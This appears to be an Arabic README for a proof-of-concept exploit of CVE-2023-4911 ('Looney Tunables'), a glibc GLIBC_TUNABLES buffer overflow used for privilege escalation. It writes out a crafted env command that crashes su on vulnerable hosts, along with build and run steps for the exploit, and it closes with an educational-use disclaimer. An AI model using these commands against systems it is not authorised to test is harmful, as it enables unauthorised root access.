
استغلال إثبات المفهوم لـ CVE-2023-4911 (Looney Tunables)، يستهدف تجاوز سعة المخزن المؤقت في تحليل GLIBC_TUNABLES الخاص بـ glibc. يشمل اكتشاف الثغرات واستغلال مُجمَّع لتصعيد الامتيازات.
هذا إثبات مفهوم لـ CVE-2023-4911 (المعروف أيضًا باسم "Looney Tunables") يستغل ثغرة في دالة تحليل متغير البيئة GLIBC_TUNABLES الخاصة بمحمل الديناميكي glibc وهي parse_tunables().
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
Segmentation fault (core dumped) فإننا نتعامل مع هدف عرضة للثغرة.libc.so.6python3 libc.py
gcc exp.c -o exp
جميع التعليمات البرمجية المقدمة في هذا المستودع هي لأغراض تعليمية/بحثية فقط. أي إجراءات و/أو أنشطة تتعلق بالمواد الواردة في هذا المستودع تقع على مسؤوليتك وحدك. إساءة استخدام التعليمات البرمجية في هذا المستودع قد تؤدي إلى توجيه تهم جنائية ضد الأشخاص المعنيين. لن يتحمل المؤلف المسؤولية في حال توجيه أي تهم جنائية ضد أي أفراد يسيئون استخدام التعليمات البرمجية في هذا المستودع لخرق القانون.